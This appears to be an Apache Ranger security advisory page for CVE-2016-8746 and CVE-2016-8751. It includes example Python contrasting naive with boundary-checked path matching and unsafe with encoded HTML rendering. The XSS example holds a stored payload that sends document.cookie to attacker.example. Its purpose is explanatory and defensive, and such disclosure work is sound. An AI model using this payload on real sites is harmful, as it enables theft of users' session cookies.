Note

Before reporting any security-related JIRAs, please go through Apache's guidance for VULNERABILITY HANDLING.

Fixed in Ranger 0.6.3

...

CVE-2016-8746: Apache Ranger path matching issue in policy evaluation

Severity: Normal

Vendor: The Apache Software Foundation

Versions Affected: 0.6.0/0.6.1/0.6.2 versions of Apache Ranger

Users affected: All users of ranger policy admin tool

Description: The Ranger policy engine incorrectly matches resource paths under certain conditions when a policy contains no wildcards and has its recursive flag set to true, so a policy could apply to paths it was not intended to cover.

Fix detail: Fixed policy evaluation logic.

Mitigation: Users should upgrade to 0.6.3 or later version of Apache Ranger with the fix.
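The following is an added example, not Ranger's own policy engine and not a reproduction of the 0.6.x defect (which the advisory does not detail). It shows the checks a recursive path matcher needs for a non-wildcard policy: an exact match, or a descendant whose next character after the policy path is the separator, and nothing else. The PathPolicy type, normalize() and the naive prefix matcher are assumptions made for the illustration; the wildcard branch is a simplified glob over the whole path.

```python
"""Illustrative recursive-path policy matching (added example, not Ranger code)."""
from dataclasses import dataclass
import fnmatch

SEP = "/"


@dataclass(frozen=True)
class PathPolicy:
    """Hypothetical policy resource: a path plus the recursive flag."""
    path: str
    recursive: bool


def normalize(path: str) -> str:
    """Collapse repeated separators and drop a trailing one (root stays "/")."""
    parts = [p for p in path.split(SEP) if p]
    return SEP + SEP.join(parts)


def naive_matches(policy: PathPolicy, resource: str) -> bool:
    """Buggy pattern for comparison: a plain prefix test.

    "/data/finance" (recursive) would also cover "/data/financeX".
    """
    return normalize(resource).startswith(normalize(policy.path))


def matches(policy: PathPolicy, resource: str) -> bool:
    """Return True if the policy resource covers the requested path."""
    p = normalize(policy.path)
    r = normalize(resource)

    if any(c in p for c in "*?"):
        # Simplified wildcard handling: glob the whole path. ("*" here matches
        # across separators, which is enough for the demonstration.)
        return fnmatch.fnmatchcase(r, p)

    if r == p:
        return True
    if not policy.recursive:
        # No wildcard and not recursive: only the exact path is covered.
        return False
    # Recursive, no wildcard: descendants only. The separator boundary is the
    # check that prevents "/data/finance" from matching "/data/financeX".
    prefix = p if p == SEP else p + SEP
    return r.startswith(prefix)


def is_allowed(policies: list, resource: str) -> bool:
    """Allow if any policy in the list matches the resource."""
    return any(matches(pol, resource) for pol in policies)


if __name__ == "__main__":
    fin = PathPolicy("/data/finance", recursive=True)
    for res in ("/data/finance", "/data/finance/q1/report.csv", "/data/financeX"):
        print(f"{res:32} naive={naive_matches(fin, res)!s:5} correct={matches(fin, res)}")
```

Run it directly to see the naive and boundary-checked results side by side; the only path on which they disagree is the sibling whose name merely begins with the policy path.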

...

CVE-2016-8751: Apache Ranger stored cross site scripting issue

Severity: Normal

Vendor: The Apache Software Foundation

Versions Affected: 0.5.x and 0.6.0/0.6.1/0.6.2 versions of Apache Ranger

Users affected: All users of ranger policy admin tool

Description: Apache Ranger was found to be vulnerable to stored cross-site scripting when entering custom policy conditions. An admin user could store arbitrary JavaScript that executes in the browser of other users when they log in and view the affected policies.

Fix detail: Added logic to sanitize the user input.

Mitigation: Users should upgrade to 0.6.3 or later version of Apache Ranger with the fix.
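The following is an added example, not Ranger's code and not the template that was actually affected. It contrasts the vulnerable pattern, a stored condition string interpolated straight into markup, with output encoding of the same value for element and attribute contexts. The stored payload and the render functions are constructed for this illustration.

```python
"""Stored XSS: unsafe vs. encoded rendering of a stored value (added example)."""
import html

# Constructed sample of what a malicious admin might save as a custom condition.
STORED_CONDITION = (
    '<script>document.location="http://attacker.example/?c="'
    "+document.cookie</script>"
)


def render_condition_unsafe(condition: str) -> str:
    """Vulnerable pattern: stored text dropped into HTML verbatim."""
    return f'<tr><td class="condition">{condition}</td></tr>'


def render_condition_safe(condition: str) -> str:
    """Fixed pattern: HTML-encode at output time.

    quote=True also encodes " and ' so the same value is safe inside an
    attribute such as title="...".
    """
    enc = html.escape(condition, quote=True)
    return f'<tr><td class="condition" title="{enc}">{enc}</td></tr>'


def has_live_script(rendered: str) -> bool:
    """Demonstration check: does a raw <script tag survive into the page?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print("unsafe :", render_condition_unsafe(STORED_CONDITION))
    print("safe   :", render_condition_safe(STORED_CONDITION))
```

The check has_live_script() is deliberately crude and only serves the demonstration; in practice the protection is that every stored value goes through context-appropriate encoding (or a templating engine that does it by default) on the way out, regardless of what was accepted on the way in.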

Fixed in Ranger 0.6.2

...

CVE-2016-6815: Apache Ranger user privilege vulnerability

...